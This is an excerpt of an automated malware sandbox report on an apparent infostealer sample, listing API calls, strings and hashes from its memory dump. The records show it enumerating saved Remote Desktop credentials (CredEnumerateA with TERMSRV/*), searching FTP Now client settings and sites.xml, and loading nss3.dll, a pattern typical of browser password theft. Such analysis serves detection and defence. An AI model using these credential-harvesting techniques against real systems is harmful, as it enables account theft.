                  • Instruction ID: a94d4ce6a8862bcab918c2400cf106f54a6507ddef4cf3c824bb74ed6eb97003
                  • Opcode Fuzzy Hash: 06f67a4a0e3afc5c5b97338d1b9377692534aeb4b7779063e44e602c447dc653
                  • Instruction Fuzzy Hash: F3010831900105B9DB1137329C02FAF3E19DB41314F24843BB955B22E2D6FC9FA18AAC
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,FTPNow), ref: 0040CBF9
                  • StrStrIA.SHLWAPI(007200D8,FTP Now,007200D8,FTPNow), ref: 0040CC0A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: FTP Now$FTPNow$sites.xml
                  • API String ID: 0-284577462
                  • Opcode ID: 5a2d900ee459afcd9954fdf8e956b5bf74b060edb0ad68932bc476247c62cd99
                  • Instruction ID: b263a6c4b0789433142b9ec9283812031cf69d713907017c093c2b39616db10d
                  • Opcode Fuzzy Hash: 5a2d900ee459afcd9954fdf8e956b5bf74b060edb0ad68932bc476247c62cd99
                  • Instruction Fuzzy Hash: 87F02670A04005B4EB306B32DD42FAF39655B41784F24023BB518B12E2EABC8F81966C
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C189
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C1AB
                  • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C1BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$OpenStorage
                  • String ID: Settings
                  • API String ID: 2489594185-473154195
                  • Opcode ID: 1d740487de696f18979e862d4e48132253c9fc08e755ef657b946a443940230f
                  • Instruction ID: 941221d1b5e35f73e9534d79b450400ad248555062b28b39a48171f98e156158
                  • Opcode Fuzzy Hash: 1d740487de696f18979e862d4e48132253c9fc08e755ef657b946a443940230f
                  • Instruction Fuzzy Hash: D031D830A4010AFBDF11AFE1CC42F9EBB76BF04748F20826AB611791F1D6759A50AB58
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: http://$https://
                  • API String ID: 0-1916535328
                  • Opcode ID: 3298a56c5f09f09c3e3e7a8400f1c6da017d87b2c36f94c5f2899de2f956eb9a
                  • Instruction ID: d051175a62bb88a713ec024e39b4392a46a63193600da9ef2a244b006afa0ba2
                  • Opcode Fuzzy Hash: 3298a56c5f09f09c3e3e7a8400f1c6da017d87b2c36f94c5f2899de2f956eb9a
                  • Instruction Fuzzy Hash: 44410631800108FBDF12AF91DE05BEE7B72AF40308F10807AB541791F1CBBA4AA1EB59
                  APIs
                  • GetTickCount.KERNEL32 ref: 004018CB
                  • GetHGlobalFromStream.OLE32(?,?), ref: 004018E4
                  • GlobalLock.KERNEL32(?), ref: 004018FF
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • GlobalUnlock.KERNEL32(?), ref: 00401927
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
                  • String ID:
                  • API String ID: 1884134869-0
                  • Opcode ID: 9e8c7c343a3ba8b6e42bcdbf617ef25788879b68666c322fd17dd1257e8940a7
                  • Instruction ID: fa894349ec8e41eab0d0ba830e0c054b9ff2bf07efe50faea15570e3bc294318
                  • Opcode Fuzzy Hash: 9e8c7c343a3ba8b6e42bcdbf617ef25788879b68666c322fd17dd1257e8940a7
                  • Instruction Fuzzy Hash: D621B87590010DBEDF11AFA1CC429DDBF7AEF04348F0040BABA14B51B2DB799B95AB48
                  APIs
                    • Part of subcall function 00401548: lstrlen.KERNEL32(00000000), ref: 00401554
                  • StrStrIA.SHLWAPI(?,004136AB), ref: 0040C84A
                  • lstrlen.KERNEL32(TERMSRV/,?,004136AB), ref: 0040C858
                  • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,004136AB), ref: 0040C868
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen
                  • String ID: TERMSRV/
                  • API String ID: 1659193697-3001602198
                  • Opcode ID: f3a8ee6282a4e3f6db9a69a6f5144106a8f0e68b97a36eedc9dc6c6e154e4739
                  • Instruction ID: 06c8ac44936cd5b1fa0ae46afa5e3ea2e95f82a9d9bbb4ca97b0d568c086e9fd
                  • Opcode Fuzzy Hash: f3a8ee6282a4e3f6db9a69a6f5144106a8f0e68b97a36eedc9dc6c6e154e4739
                  • Instruction Fuzzy Hash: EB11A831450109BBCF126FA1CC42CDE3E62AF55359F108536B915752F1D77A8AB1AB88
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00408C56
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408C77
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectorylstrlen
                  • String ID: nss3.dll
                  • API String ID: 2713697268-2492180550
                  • Opcode ID: 8815094c7fd1fd20449cb55087e789c3a84d2a4623d1d5bb4d157efc85b5181e
                  • Instruction ID: f1d91d0dd5899a745220176361581cd3732e4b9ece975038861849ba2aa67b00
                  • Opcode Fuzzy Hash: 8815094c7fd1fd20449cb55087e789c3a84d2a4623d1d5bb4d157efc85b5181e
                  • Instruction Fuzzy Hash: 311182305052419BEB256F20EF0978A3F71BB05348F10813EF406E52F6DFF94865961E
                  APIs
                  • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040C8FB
                  • CredFree.ADVAPI32(00000000), ref: 0040C942
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Cred$EnumerateFree
                  • String ID: TERMSRV/*
                  • API String ID: 3403564193-275249402
                  • Opcode ID: b28022198875cfa781cfb2bc2165eea29b141934139aa9cb061d4893e741070c
                  • Instruction ID: 294abffb2cfa459f6608875a23fed19a1efe6438d229e5c72e41a04cdb8eb016
                  • Opcode Fuzzy Hash: b28022198875cfa781cfb2bc2165eea29b141934139aa9cb061d4893e741070c
                  • Instruction Fuzzy Hash: 23115E71800204EBDF218F88C848BDEBBB5AF00315F148276D541B12F0D3795A84DB8D
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00401C42
                  • lstrlen.KERNEL32(00000000,?), ref: 00401C4C
                  • lstrcpy.KERNEL32(00000000,?), ref: 00401C60
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401C69
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID:
                  • API String ID: 2414487701-0
                  • Opcode ID: 9b24d35cd82ca6673d6072b248acc88e076e622046546d064a1723d21eeab292
                  • Instruction ID: 7dc0d747844ad8693d5b3fcbf74b2ff173d7593578b7ac928320faef0b1e46f6
                  • Opcode Fuzzy Hash: 9b24d35cd82ca6673d6072b248acc88e076e622046546d064a1723d21eeab292
                  • Instruction Fuzzy Hash: 84F0177114420CBADF217F62CC85A9D3A69AB11359F10C03BB919291B2D7BDC988DB68